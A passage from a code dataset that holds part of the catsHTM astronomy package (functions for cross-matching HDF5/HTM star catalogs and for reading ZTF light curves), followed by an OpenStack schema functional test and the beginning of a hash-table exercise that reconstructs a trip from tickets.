NaN if no source was found\n example:\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\"\"\"\n\n if RadiusUnits=='rad':\n Radius=Radius\n if RadiusUnits=='arcsec':\n Radius=math.pi*Radius/(180.*3600.)\n\n Ncat=np.shape(Cat)[0]\n #print('Ncat is',Ncat)#ok\n #print('Refcat is',Refcat)\n Nref=np.shape(Refcat)[0]\n #print('Nref is', Nref)#ok\n Radius=Radius*np.ones(Nref)\n Res=[]\n Iuppx=mfind_bin(Cat[:,1],Refcat[:,1]+Radius) #only if second column is dec!\n Ilowx=mfind_bin(Cat[:,1],Refcat[:,1]-Radius) #only if second column is dec!\n #print('Iupx is',Iuppx)#ok\n #print('Ilowx is',Ilowx)#ok\n Ilow=np.zeros(np.shape(Ilowx)[0])\n for r,s in enumerate(Ilowx):\n Ilow[r]=max(1,Ilowx[r])\n #Ilow=np.max(1,Ilowx)\n\n Iupp=np.zeros(np.shape(Iuppx)[0])\n for r,s in enumerate(Iuppx):\n Iupp[r]=min(Ncat,Iuppx[r]+1)\n #print('Iup is',Iupp)#ok\n #print('Ilow is',Ilow)#ok\n Ncand=Iupp-Ilow\n Ic=np.array(np.where(Ncand>=1))[0]\n #print('Ic is',Ic)\n #print(np.shape(Ic))\n #print('Ic is',Ic)#index where condition verified, same as matlab one -1\n Nc=np.shape(Ic)[0]\n #print('Nc is',Nc)\n #pdb.set_trace()\n\n Vec=dict()\n Vec['Nfound']=np.zeros(Nref)\n #vectornan=np.empty(Nref)\n #vectornan[:]=np.nan\n Vec['MinDist']=np.full(Nref, np.nan)#vectornan\n Vec['MinPa']=np.full(Nref, np.nan)#vectornan\n K=0\n IndCatMinDist=np.full(Nref, np.nan)#vectornan\n\n for Icr in range(Nc):\n #print(\"Vec['MinDist']5 is\", Vec['MinDist'])\n #print('Nc is',Nc)\n Iref=Ic[Icr]\n #print('Iref is',Iref)#ok\n #pdb.set_trace()\n Icat=np.linspace(Ilow[Iref],Iupp[Iref],Iupp[Iref]-Ilow[Iref]+1).astype(int)\n #print('Icat is',Icat)#ok\n #print('Cat[Icat-1,0] is',Cat[Icat-1,0])#ok\n #print('Cat[Icat-1,1] is',Cat[Icat-1,1])#ok\n #print('Refcat[Iref,0]',Refcat[Iref,0])#ok\n #print( 'Refcat[Iref,1]) is',Refcat[Iref,1])#ok\n Dist=celestial.sphere_dist_fast(Cat[Icat-1,0],Cat[Icat-1,1],Refcat[Iref,0],Refcat[Iref,1])[0]\n #print('Dist is',Dist)\n #print('Radius[Iref] is',Radius[Iref])\n IndRelative=np.where(Dist<=Radius[Iref])[0]\n IndCat=Ilow[Icr]-1+IndRelative\n #print('IndRelative is',IndRelative)#ok\n #print('IndCat is',IndCat)#ok\n Vec['Nfound'][Iref]=np.shape(IndCat)[0]#ok\n #print(\"Vec['Nfound'][Iref] is\",Vec['Nfound'][Iref])#ok\n #pdb.set_trace()\n if Vec['Nfound'][Iref]>0:\n Vec['MinDist'][Iref]=np.min(Dist[IndRelative])\n MinInd=np.argmin(Dist[IndRelative])\n Resi=dict()\n K=K+1\n Resi['IndCat']=IndCat\n Resi['IndRef']=Iref\n Resi['Num']=np.shape(IndCat)[0]\n Resi['Dist']=Dist[IndRelative]\n Res.append(Resi)\n #print(\"Vec['MinDist'] 1.5 is\", Vec['MinDist'])\n IndCatMinDist[Iref]=IndCat[MinInd]\n ##print('IndCatMinDist[Iref] is {0} and p.min(Dist[IndRelative]) is {1}'.format(IndCatMinDist[Iref],np.min(Dist[IndRelative])) )\n # #print(\"Vec['MinDist'] 1.8 is\", Vec['MinDist'])# ca met IndCatMinDist[Iref] dans Vec['MinDist'][Iref]\n # print(\"Vec['MinDist'] 2 is\", Vec['MinDist'])\n #print(\"Vec['MinDist'] 3 is\", Vec['MinDist'])\n #pdb.set_trace()\n #print(\"Vec['MinDist'] 4 is\", Vec['MinDist'])\n #pdb.set_trace()\n return Vec,Res,IndCatMinDist #Match,Ind,IndCatMinDist\n\ndef Save_cross_matched_catalogs(Cat1,Cat2Matched,output_dir=None):\n \"\"\"Description: save the outputs of xmatch_2cats, in a directory with\n Input :- Catalog 1 basename\n - Catalog 2 basename\n -Search_radius: default is 2\n -Search_radius_units: default is arcsec\n -QueryFun: function to be applied to the catalog\n -QUeryFunPar: parameters for QueryFun\n Output :\n example:\n By : Maayane Soumagnac (original Matlab function by Eran 
Ofek) August 2018\n \"\"\"\n\n'''\ndef Example_QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,i):\n print('I am running Example_QueryAllFun')\n print('Cat1 is',Cat1)\n print('Ind is',Ind)\n print('Cat2 is',Cat2)\n print('IndCatMinDist is',IndCatMinDist)\n np.save(\"./Cat1_\"+str(i)+'.txt',Cat1)\n return Cat1\n'''\n\ndef Example_QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,i,additionnal_args=None):\n print('****** I am running Example_QueryAllFun *******')\n print(\"Cat1, the content of the catalog_1's trixel is\",Cat1)\n print(\"Cat2, the content of a catalog_2' trixel overlapping with Cat1 is\", Cat2)\n print(\"Ind is a list of dictionnaries, with one dictionnary per Cat1's object having one or more counterparts in Cat2; \")\n print(\"\"\"Ind[i][\"IndRef\"]=Index of the Cat1's source having one or more counterpart in Cat2\"\"\")\n print(\"\"\"Ind[i][\"IndCat\"]=List of indixes of the Cat2's counterparts.\"\"\")\n print(\"\"\"Ind[i][\"Dist\"]= Vecor of angular distances (radians) between the Cat1's source and its counterparts in Cat2\"\"\")\n print('Ind:',Ind)\n print(\"IndCatMinDist is a vector, with as many elements as lines in Cat1, with 'nan' at lines where there is no counterpart in Cat2, and at line where there is, the catalog_2's index of the closest counterpart\")\n print('IndCatMinDist:',IndCatMinDist)\n if additionnal_args is not None:\n np.savetxt(additionnal_args[0]+\"/Cat1_\"+str(i)+'.txt',Cat1)\n else:\n np.savetxt(\"./Cat1_\" + str(i) + '.txt', Cat1)\n print('***********************************************')\n print('press \"c\" to continue, \"q\" to quit')\n pdb.set_trace()\n return Cat1\n\ndef xmatch_2cats(Catname1,Catname2,Search_radius=2,QueryAllFun=None,QueryAllFunPar=None,\n catalogs_dir='./data',Verbose=False,save_results=False,save_in_one_file=True,\n save_in_separate_files=True,output='./cross-matching_results',time_it=True,Debug=False):\n \"\"\"Description: cross match two HDF5/HTM catalogs: for each source in the first catalog, the index of the nearest source in the second catalog\n (nearest within some specified distance) is saved.\n Input :- Catalog 1 basename\n - Catalog 2 basename\n -Search_radius: default is 2 (in arcsec)\n -QueryFun: function to be applied to the catalog\n -QUeryFunPar: parameters for QueryFun\n -Verbose: set to True if yu want the code to tell you what it is doing at each step and output intermediate outputs\n -save_results: if True the the cross-matching pieces of catalog_1 and catalog_2 will be saved. Beware: only on object of catalog 2 (the closest)\n is saved per object of catalog 1 having a counterpart.\n -save_in_one_file: if True the results will be saved in one file, of which the first columns are of catalog1 (only those for which\n cross matching entries in catalog_2 were found), and then come the columns of catalog2\n -save_in_two_files: if True the results will be saved in two separate files. One has the entries of catalog_1 having at least one counterpart in catalog2\n and the second is the entries of catalog 2 for the closest counterparts of catalog_2\n -catalogs_dir: the directory where the HDF5 catalogs are stored\n Output : if save_results=True, the cross-matching pieces of catalog_1 and catalog_2 are stored in the output directory given as the \"output\" key.\n example: catsHTM.xmatch_2cats('FIRST','NVSS',Verbose=False,save_in_one_file=True,save_results=True,save_in_separate_files=True)\n By : Maayane Soumagnac (original Matlab function by Eran Ofek) August 2018\n \"\"\"\n\n #Converts search_radius into radians\n\n Rad = 180. 
/ math.pi\n Search_radius=Search_radius/(Rad*3600) #converts arcsec radius into radians radius\n\n ###### find the max level between the two catalogs #####\n\n CatDir1=get_CatDir(Catname1) # directory name of catalog 1\n CatDir2=get_CatDir(Catname2) # directory name of catalog 2\n ##if Verbose==True:\n\n\n IndexFileName1 = get_index_filename(Catname1)[0] # name of the index file associated with Catname\n IndexVarName1 = get_index_filename(Catname1)[1] # name of the data set containing the index filename content\n HTM1 = load_HTM_ind(IndexFileName1, IndexVarName1, catalogs_dir=catalogs_dir, CatDir=CatDir1)[0]#content of the catalog index file as a dictionary\n\n IndexFileName2 = get_index_filename(Catname2)[0] # name of the index file associated with Catname\n IndexVarName2 = get_index_filename(Catname2)[1] # name of the data set containing the index filename content\n HTM2 = load_HTM_ind(IndexFileName2, IndexVarName2, catalogs_dir=catalogs_dir,\n CatDir=CatDir2)[0]\n\n N_trixels_1=Number_of_trixels(Catname1,catalogs_dir=catalogs_dir,CatDir=CatDir1) # number of trixels in catalog 1\n N_trixels_2=Number_of_trixels(Catname2,catalogs_dir=catalogs_dir,CatDir=CatDir2) # number of trixels in catalog 2\n #if Verbose==True:\n print('Catalog_1 is {0} ({1} trixels)'.format(Catname1,N_trixels_1))\n print('Catalog_2 is {0} ({1} trixels)'.format(Catname2, N_trixels_2))\n\n #print('Catalog_2 is', CatDir2)\n #print('The number of trixels in {0} is {1}'.format(CatDir1,N_trixels_1))\n #print('The number of trixels in {0} is {1}'.format(CatDir2,N_trixels_2))\n\n L1=celestial.number_of_trixels_to_level(N_trixels_1)[0] #number of levels in catalog 1\n L2=celestial.number_of_trixels_to_level(N_trixels_2)[0] #number of levels in catalog 2\n\n if Verbose==True:\n print('The level of {0} is {1}'.format(Catname1,L1))\n print('The level of {0} is {1}'.format(Catname2,L2))\n\n Lmax=max(L1,L2)\n if Verbose==True:\n print('Lmax is',Lmax)#ok compared with Eran; maximum level between cat1 and cat2\n\n ####### Create the list of trixel's indexes associated with each level #########\n print('************** I am building all the trixels relevant to our search **************')\n\n built_array = celestial.htm_build(Lmax,Verbose=Verbose)\n HTM=built_array[0]\n Level=built_array[1] # a list of Lmax dictionaries, such that dic['level'] is the level number (0 for level 1) and dic['ptr'] is a np array of the trixel indices at that level\n #print(HTM[0].coo())\n #pdb.set_trace()\n #print('HTM[0] is',HTM[0])#ok compared with eran\n #print('HTM[1] is', HTM[1])#ok compared with Eran\n #print('HTM[0][coo] is',HTM[0]['coo'])#ok w Eran\n #print('HTM[8][coo] is', HTM[8]['coo'])# ok\n #print('HTM[9][coo] is', HTM[9]['coo'])#ok\n #print('HTM[10920][coo] is',HTM[10920]['coo'])#ok\n\n #('HTM[10920] is',HTM[10920])\n #pdb.set_trace()\n\n Level1=Level[L1-1] # the Level dictionary for level L1: Level1['level']=L1-1 and Level1['ptr'] is the numpy array of the trixel indices at that level\n Level2=Level[L2-1]\n if Verbose==True:\n print('Level1:',Level1)\n print('Level2:',Level2)\n\n Nh1=len(Level1['ptr'])#the number of trixels in the highest level\n print('The number of trixels in the highest level, for {0} is {1}'.format(Catname1,Nh1))#ok\n #pdb.set_trace()\n Nh2=len(Level2['ptr'])\n print('The number of trixels in the highest level, for {0} is {1}'.format(Catname2, Nh2)) #ok\n #pdb.set_trace()\n\n ColCell2=load_colcell(catalogs_dir+'/'+CatDir2,Catname2)[0]\n 
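    # load_colcell returns the (ColCell, ColUnits) pair, so this call and the one
    # below could be collapsed into a single read (an equivalent sketch):
    #   ColCell2, ColUnits2 = load_colcell(catalogs_dir+'/'+CatDir2, Catname2)
    # which also avoids parsing the _htmColCell.mat file twice.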
ColUnits2=load_colcell(catalogs_dir+'/'+CatDir2,Catname2)[1]\n Ncol2=np.shape(ColCell2)[0]\n\n ColCell1=load_colcell(catalogs_dir+'/'+CatDir1,Catname1)[0]\n ColUnits1=load_colcell(catalogs_dir+'/'+CatDir1,Catname1)[1]\n Ncol1=np.shape(ColCell1)[0]\n if Verbose==True:\n print('{0} has the following fields {1}'.format(CatDir1,ColCell1))\n print('in units',ColUnits1)\n print('{0} has the following fields {1}'.format(CatDir2, ColCell2))\n print('in units', ColUnits2)\n #At this stage, we have 2 Level dictionnaries, one per each catalog, such that LevelX['level'] is the number of the highest level (0 for level 1)\n # and LevelX['ptr'] is the list of trixels indexes at the highest level\n #Next, we go through all the highest level trixels of Catalog 1, and for each trixel, if it contains sources, we check if there are some overlapping trixels in catalog 2\n\n if save_results == True:\n if os.path.exists(output):\n print('the output directory, ' + output + ' exists already')\n else:\n os.mkdir(output)\n header1 = \",\".join([Catname1+':'+ColCell1[i] + ' (' + ColUnits1[i] + ')' for i in range(np.shape(ColCell1)[0])])\n header2 = \",\".join([Catname2+':'+ColCell2[i] + ' (' + ColUnits2[i] + ')' for i in range(np.shape(ColCell2)[0])])\n cross_matching_result = np.empty((1, np.shape(ColCell1)[0] + np.shape(ColCell2)[0]))\n #print(np.shape(cross_matching_result))\n #print('header1 is',header1)\n #print('header2 is', header2)\n #print(header1+','+header2)\n if save_results==True:\n if save_in_one_file==True:\n if os.path.exists(output + '/cross-matching_result_full.txt'):\n print('the txt file exists already, I am removing it')\n os.remove(output + '/cross-matching_result_full.txt')\n if save_in_separate_files==True:\n if os.path.exists(output + '/cross-matching_result_{0}.txt'.format(Catname1)):\n print('the txt file for {0} exists already, I am removing it'.format(Catname1))\n os.remove(output + '/cross-matching_result_{0}.txt'.format(Catname1))\n if os.path.exists(output + '/cross-matching_result_{0}.txt'.format(Catname2)):\n print('the txt file for {0} exists already, I am removing it'.format(Catname2))\n os.remove(output + '/cross-matching_result_{0}.txt'.format(Catname2))\n\n #print(\"Level1['ptr'] is\", Level1['ptr'])\n #np.savetxt('indexes.txt',Level1['ptr'])\n print('************** I am looking for overlapping trixels **************')\n start = time.time()\n if Debug == True:\n print('I will stop at the following indexes, if the trixels exists, to debug, ok? 
press c to continue',\n [Nh1//1000,Nh1//200,Nh1 // 100, Nh1 //10, Nh1 //4, Nh1 //3, Nh1 // 2, Nh1 // 1.5])\n pdb.set_trace()\n for i in range(Nh1): #for each trixels in the highest level of Cat1\n #print(\"Level1['ptr'][Nh1-1] is\",Level1['ptr'][Nh1-1])\n #print(\"Level1['ptr'][i] is\",Level1['ptr'][i])\n\n index_cat1=Level1['ptr'][i]# takes the index of this trixel and check if this trixel contains sources:\n #print('I am looking for Catalog_2 ({0}) trixels overlapping with the trixel #{2} of Catalog_1 ({1})'.format(Catname2,Catname1,index_cat1))\n if HTM1[index_cat1-1]['Nsrc']>0:#if the trixel contains sources:\n #if index_cat1==27305:\n\n print('I am looking for Catalog_2 ({0}) trixels overlapping with the non-empty trixel #{2} ({3}/{4}) of Catalog_1 ({1})'.format(\n Catname2, Catname1, index_cat1,i,Nh1))\n if Verbose==True:\n print('there are {0} sources in this trixel'.format(HTM1[index_cat1-1]['Nsrc']))\n #print('not empty')\n #print('I am looking for Catalog_2 ({0}) trixels overlapping with the trixel #{2} of Catalog_1 ({1})'.format(Catname2,Catname1,index_cat1))\n #print('the file with index {0} has {1} sources'.format(index_cat1,HTM1[index_cat1]['Nsrc']))\n #start = time.time()\n Cat1=load_trix_by_ind(Catname1,index_cat1,num=100,catalogs_dir=catalogs_dir,Verbose=Verbose)[0]#load the content of that trixel (in the form of a numpy array)\n #ongoing1=time.time()\n #print(Cat1)#ok\n #Cat 1 is a numpy array with the content of a trixel that contains sources, at the highest level of Catalog1\n #PolesCoo ok\n #print(\"HTM[index_cat1-1]['coo'] is\",HTM[index_cat1-1]['coo'])#ok\n\n\n MeanRa=np.mean(HTM[index_cat1-1]['coo'][:,0]) # le meam Ra de ce trixel\n MeanDec=np.mean(HTM[index_cat1-1]['coo'][:,1]) # le mean Dec de ce trixel\n\n MinDec=np.min(HTM[index_cat1-1]['coo'][:,1])-Search_radius\n MaxDec = np.max(HTM[index_cat1 - 1]['coo'][:, 1]) + Search_radius\n #print('MeanRa is', MeanRa) #ok\n #print('MeanDec is',MeanDec)#ok\n\n D=celestial.sphere_dist_fast(MeanRa,MeanDec,HTM[index_cat1-1]['coo'][:,0],HTM[index_cat1-1]['coo'][:,1])[0]\n #print('D is',D)\n CircRadius=np.max(D)+Search_radius\n #print('CircRadius is',CircRadius)\n ID2=celestial.htm_search_cone(HTM2,MeanRa,MeanDec,CircRadius,Ind=[])\n #if Verbose==True:\n ID2w=simplify3(ID2)\n ongoing2 = time.time()\n if Verbose==True:\n print('there are {0} trixel overlapping with it'.format(len(ID2w)))#ok\n #pdb.set_trace()\n print('the list of trixels indexes of Catalog_2({0}) overlapping with the trixel #{2} of Catalog_1({1}) is {3}'.format(\n Catname2, Catname1, index_cat1,ID2w))\n #print('the list without brakets is',ID2w)# a list of indexes of cat2 trixels, which overlap with the cat1 trixel\n\n #load all the data corresponding to ID2w\n Nid2=len(ID2w) #the number of trixels of cat 2 overlapping with the given trixel of cat1 which we are examining.\n\n for s in range(Nid2):#for all trixels of catalog 2 overlapping with the given trixel of catalog1\n if s==0:\n [Cat2,Ind2]=load_trix_by_ind(Catname2,ID2w[s],[MinDec,MaxDec],catalogs_dir=catalogs_dir,Ncol=Ncol2,Verbose=Verbose)\n N2=np.shape(Cat2)[0]\n #Cat2ID=np.array(list(zip(ID2w[i]*np.ones(N2),Ind2+np.array(range(N2)))))#MAYBE Ind2-1?\n #print('len(Cat2) after i=0 is',len(Cat2))\n #pdb.set_trace()\n else:\n if Verbose==True:\n print('**********')\n print(\"(catalog_2) {0}'s trixel (overlapping with (catalog_1) {1}'s trixel) of index {2}:\".format(Catname2,Catname1,index_cat1))\n 
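                    # The [MinDec,MaxDec] argument below makes load_trix_by_ind return only
                    # rows whose (sorted) Dec lies in the cone's declination band: the
                    # trixel's Dec range padded by Search_radius. For a 2 arcsec radius the
                    # pad is 2/206264.8 ~ 9.7e-6 rad, so only a thin Dec slab of each
                    # overlapping trixel is actually read from the HDF5 file.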
[Cat2tmp,Ind2]=load_trix_by_ind(Catname2,ID2w[s],[MinDec,MaxDec],catalogs_dir=catalogs_dir,Ncol=Ncol2,Verbose=Verbose)
            if len(Cat2)>0:
                if len(Cat2tmp)>0:
                    Cat2=np.vstack((Cat2,Cat2tmp))
                    N2 = np.shape(Cat2)[0]
            else: # Cat2 was empty so far
                if len(Cat2tmp)>0: # if Cat2tmp is not empty, Cat2 becomes it
                    Cat2=np.copy(Cat2tmp)
                    N2 = np.shape(Cat2)[0]
        # At this point Cat2 is a catalog with the content of *all* the catalog-2 trixels
        # overlapping the given trixel of cat1.
        if len(Cat2)>0:
            # cat2 is Cat2 sorted by increasing Dec, which match_cats requires.
            cat2=Cat2[Cat2[:, 1].argsort(),]
            # cat2 holds every source of the overlapping trixels; match_cats keeps only the
            # sources that actually match within the search radius.
            [Match,Ind,IndCatMinDist]=match_cats(cat2,Cat1,Radius=Search_radius,RadiusUnits='rad')
            # Match: a dictionary with the following keys:
            #   Match['Nfound']: vector, the length of Cat1, with the number of cat2 sources
            #                    within the search radius of each source of the reference catalog Cat1.
            #   Match['MinDist']: vector, the length of Cat1, with the minimum distance (radians)
            #                     from each Cat1 source to the cat2 sources; NaN if none was found.
            # Ind: a list of dictionaries, one per Cat1 source that has cross-matched sources in cat2:
            #   Ind[i]['IndRef']: index of the source in Cat1
            #   Ind[i]['IndCat']: list of indices in cat2 matched to the 'IndRef' source of Cat1
            #   Ind[i]['Dist']: vector of angular distances (radians) for each source in 'IndCat'
            #   Ind[i]['Num']: number of sources within the search radius
            # IndCatMinDist: vector of indices of the cat2 objects closest to each Cat1 source;
            #                NaN if none was found.
            if QueryAllFun is not None:
                Data=QueryAllFun(Cat1,Ind,Cat2,IndCatMinDist,i,additionnal_args=QueryAllFunPar)
                # (The original MATLAB routine also passed Data, Ih1, Nh1 and the search radius
                # to QueryAllFun.)
            IsN=np.isnan(IndCatMinDist) # True where a Cat1 source has no cross-matched cat2 source
            IndCatMinDist[IsN]=True
            # IndCatMinDist is now, per Cat1 source, 1 where there is no cross-match in cat2,
            # and otherwise the index of the closest cat2 object.
            # (A Cat2ID/DataInd bookkeeping step of the MATLAB code is dropped in this port;
            # its purpose was unclear.)
            # THIS CHECK IS CRUCIAL - DO NOT ERASE: indexes_analog_to_matlab must equal the
            # MATLAB IndCatMinDist-1 everywhere.
            indexes_analog_to_matlab=np.zeros(np.shape(IndCatMinDist))
            indexes_analog_to_matlab[IndCatMinDist!=1]=IndCatMinDist[IndCatMinDist!=1]
            Cat2matched = cat2[indexes_analog_to_matlab.astype(int), :]
            # Cat2matched has one row per Cat1 source: row 0 of cat2 where that source has no
            # cross-match, and otherwise the cat2 row of the closest object.
            Cat2matched[IsN,:]=np.nan # rows with no cross-match become NaN
            if Debug==True:
                if i in [Nh1//1000,Nh1//200,Nh1 // 100, Nh1 //10, Nh1 //4, Nh1 //3, Nh1 // 2, Nh1 // 1.5]:
                    print('******** i={0} ********'.format(i))
                    print('I am saving Cat2matched')
                    np.savetxt(output+'Cat2matched_{0}_4debug.txt'.format(i),Cat2matched)
                    pdb.set_trace()
            # From here on (added on top of the MATLAB port): build a numpy array with the
            # columns of Cat1 followed by the columns of Cat2matched, then keep only the rows
            # that actually have a counterpart in cat2.
            if save_results==True:
                cross_matching_result_w_nans=np.hstack((Cat1,Cat2matched))
                cross_matching_result_intermediate = np.zeros((1, np.shape(Cat1)[1] + np.shape(cat2)[1]))
                # NB: this loop reuses the name i (shadowing the trixel index used above); j is unused.
                for i,j in enumerate(cross_matching_result_w_nans[:,0]):
                    if np.all(np.isnan(cross_matching_result_w_nans[i, np.shape(Cat1)[1]:])) == False:
                        if Verbose==True:
                            print('At line {0} of Cat1, there is a cross-matched object in cat2'.format(i))
                        if np.shape(cross_matching_result_intermediate)[0]<2:
                            cross_matching_result_intermediate=cross_matching_result_w_nans[i,:]
                            cross_matching_result_intermediate_cat1 = cross_matching_result_w_nans[i, :np.shape(Cat1)[1]]
                            cross_matching_result_intermediate_cat2 = cross_matching_result_w_nans[i,np.shape(Cat1)[1]:np.shape(Cat1)[1]+np.shape(Cat2matched)[1]]
                        else:
                            cross_matching_result_intermediate=np.vstack((cross_matching_result_intermediate,cross_matching_result_w_nans[i,:]))
                            cross_matching_result_intermediate_cat1 = cross_matching_result_intermediate[:, :np.shape(Cat1)[1]]
                            cross_matching_result_intermediate_cat2 = cross_matching_result_intermediate[:,np.shape(Cat1)[1]:np.shape(Cat1)[1]+np.shape(Cat2matched)[1]]
                all_zeros = not np.any(cross_matching_result_intermediate)
                if all_zeros==True:
                    print('There are no counterparts at all in cat2 for this trixel')
                else:
                    if Verbose is True:
                        print('The entries from catalog_1 ({0}) :{1}, cross-matched in catalog_2 ({2}) are {3}'.format(Catname1,cross_matching_result_intermediate_cat1,Catname2,cross_matching_result_intermediate_cat2))
                    # (The MATLAB original could run QueryFun here, selecting sources by attribute
                    # from the matched Cat1/Cat2matched, and SaveFun to store the selection.)
                    if save_in_one_file==True:
                        if os.path.exists(output+'/cross-matching_result_full.txt')==False:
                            with open(output+'/cross-matching_result_full.txt', 'ab') as f:
                                if cross_matching_result_intermediate.ndim>1:
                                    np.savetxt(f, cross_matching_result_intermediate, delimiter=',', header=header1+','+header2)
                                else:
                                    np.savetxt(f, cross_matching_result_intermediate[None], delimiter=',', header=header1+','+header2)
                        else:
                            with open(output+'/cross-matching_result_full.txt', 'ab') as f:
                                if cross_matching_result_intermediate.ndim>1:
                                    np.savetxt(f, cross_matching_result_intermediate, delimiter=',')
                                else:
                                    np.savetxt(f, cross_matching_result_intermediate[None], delimiter=',')
                    if save_in_separate_files==True:
                        if os.path.exists(output+'/cross-matching_result_{0}.txt'.format(Catname1))==False:
                            with open(output+'/cross-matching_result_{0}.txt'.format(Catname1), 'ab') as f:
                                if cross_matching_result_intermediate_cat1.ndim>1:
                                    np.savetxt(f, cross_matching_result_intermediate_cat1, delimiter=',', header=header1)
                                else:
                                    np.savetxt(f, cross_matching_result_intermediate_cat1[None], delimiter=',', header=header1)
                        else:
                            with open(output+'/cross-matching_result_{0}.txt'.format(Catname1), 'ab') as f:
                                if cross_matching_result_intermediate_cat1.ndim>1:
                                    np.savetxt(f, cross_matching_result_intermediate_cat1, delimiter=',')
                                else:
                                    np.savetxt(f, cross_matching_result_intermediate_cat1[None], delimiter=',')
                        if os.path.exists(output+'/cross-matching_result_{0}.txt'.format(Catname2))==False:
                            with open(output+'/cross-matching_result_{0}.txt'.format(Catname2), 'ab') as f:
                                if cross_matching_result_intermediate_cat2.ndim>1:
                                    np.savetxt(f, cross_matching_result_intermediate_cat2, delimiter=',', header=header2)
                                else:
                                    np.savetxt(f, cross_matching_result_intermediate_cat2[None], delimiter=',', header=header2)
                        else:
                            with open(output+'/cross-matching_result_{0}.txt'.format(Catname2), 'ab') as f:
                                if cross_matching_result_intermediate_cat2.ndim>1:
                                    np.savetxt(f, cross_matching_result_intermediate_cat2, delimiter=',')
                                else:
                                    np.savetxt(f, cross_matching_result_intermediate_cat2[None], delimiter=',')
        else:
            print('None of the trixels of catalog_2 ({0}) overlapping with trixel #{1} of catalog_1 ({2}) has sources in it'.format(Catname2,index_cat1,Catname1))
    else:
        print('trixel #{0} of Catalog_1 ({1}) is empty'.format(index_cat1,Catname1))
    if time_it==True:
        ongoing7 = time.time()
        print('it took {0} seconds for the process to run'.format(ongoing7 - start))


def read_ztf_HDF_matched(FieldID,Lines,ColCell=None,path=None):
    """
    Description: Read ZTF matched light curves from local HDF5 light curve files.
The HDF5 files are distributed as part of the catsHTM catalogs.\n Input : - ZTF field number.\n - [start end] lines to read. The lines for a given source are\n available in I1 and I2 in the 'ztfSrcLCDR1' catsHTM catalog.\n * Arbitrary number of pairs of arguments: ...,keyword,value,...\n where keyword are one of the followings:\n 'FileTemp' - File template name. Default is\n 'ztfLCDR1_%06d.hdf5'.\n 'ColCell' - Column names for catalog.\n Default is\n {'HMJD','Mag','MagErr','ColorCoef','Flags'}.\n Output : - Catalog\n - ColCell\n By : Maayane Soumagnac. Trnslated from Eran O. Ofek's matlab routine with the same name\n URL : http://weizmann.ac.il/home/eofek/matlab/\n Example: Cat=VO.ZTF.read_ztf_HDF_matched(686,[1 100])\n Cat=VO.ZTF.read_ztf_HDF_matched(703,[38104798 38104901])\n \"\"\"\n #FileTemp = 'ztfLCDR1_%06d.hdf5';\n if ColCell is None:\n ColCell = np.array(['HMJD','Mag','MagErr','ColorCoef','Flags'])\n #InPar = InArg.populate_keyval(DefV,varargin,mfilename);\n if path is None:\n path='./'\n\n FieldIDstring=\"{number:06}\".format(number=FieldID)#'ztfLCDR1_%06d.hdf5'\n FileName = 'ztfLCDR1_'+FieldIDstring+'.hdf5'\n #dataset='ztfLCDR1_'+FieldIDstring\n #print(FileName)\n #print(path+'/'+FileName)\n\n Ncol = len(ColCell)\n\n #print(class_HDF5.HDF5(path+'/'+FileName).info())\n #print([Lines[0],0])\n #print([Lines[1],1])\n Cati = class_HDF5.HDF5(path+'/'+FileName).load(dataset_name='/AllLC',numpy_array=True)#,Offset=[Lines[0],Lines[1]-Lines[0]+1])#,Block=[Lines[1]-Lines[0], Ncol-1])\n Cat=Cati.T\n #print(np.shape(Cat))\n Cat_cut=Cat[Lines[0]-1:Lines[1],:]\n #print(Cat_cut)\n return Cat_cut,ColCell\n #if (nargout>2):\n # CatProp = HDF5.load(FileName,'/IndAllLC');\n #end\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"build/lib/catsHTM/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":72031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"73784495","text":"# Copyright 2012 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_serialization import jsonutils\nimport requests\n\nfrom subject.tests import functional\n\n\nclass TestSchemas(functional.FunctionalTest):\n\n def setUp(self):\n super(TestSchemas, self).setUp()\n self.cleanup()\n self.start_servers(**self.__dict__.copy())\n\n def test_resource(self):\n # Ensure the subject link works and custom properties are loaded\n path = 'http://%s:%d/v1/schemas/subject' % ('127.0.0.1', self.api_port)\n response = requests.get(path)\n self.assertEqual(200, response.status_code)\n subject_schema = jsonutils.loads(response.text)\n expected = set([\n 'id',\n 'name',\n 'visibility',\n 'checksum',\n 'created_at',\n 'updated_at',\n 'tags',\n 'size',\n 'virtual_size',\n 'owner',\n 'container_format',\n 'disk_format',\n 'self',\n 'file',\n 'status',\n 'schema',\n 'direct_url',\n 'locations',\n 'min_ram',\n 'min_disk',\n 'protected',\n ])\n self.assertEqual(expected, set(subject_schema['properties'].keys()))\n\n # Ensure the subjects link works and agrees with the subject schema\n path = 'http://%s:%d/v1/schemas/subjects' % ('127.0.0.1', self.api_port)\n response = requests.get(path)\n self.assertEqual(200, response.status_code)\n subjects_schema = jsonutils.loads(response.text)\n item_schema = subjects_schema['properties']['subjects']['items']\n self.assertEqual(item_schema, subject_schema)\n\n self.stop_servers()\n","sub_path":"subject/tests/functional/v2/test_schemas.py","file_name":"test_schemas.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"247957289","text":"from hashtables import (HashTable,\n hash_table_insert,\n hash_table_retrieve)\n\n\nclass Ticket:\n def __init__(self, source, destination):\n self.source = source\n self.destination = destination\n\n\ndef reconstruct_trip(tickets, length):\n hashtable = HashTable(length)\n route = [None] * length\n\n # Starting trip, will have the source of NONE\n # The final destination, will have the destination of NONE\n # Doing this, will have our first and last routes for the trip\n # In between the first and last routes, we will want to link source\n # and destinations together to create the proper list.\n # Looping over the list, to match source & destination\n # key/value pair\n # Things we have are tickets, length of list, source, and destination\n # With what we have within the hashtables file, we need to be able to\n # insert items within the list and we need to be able to retrieve items\n # within the list. 
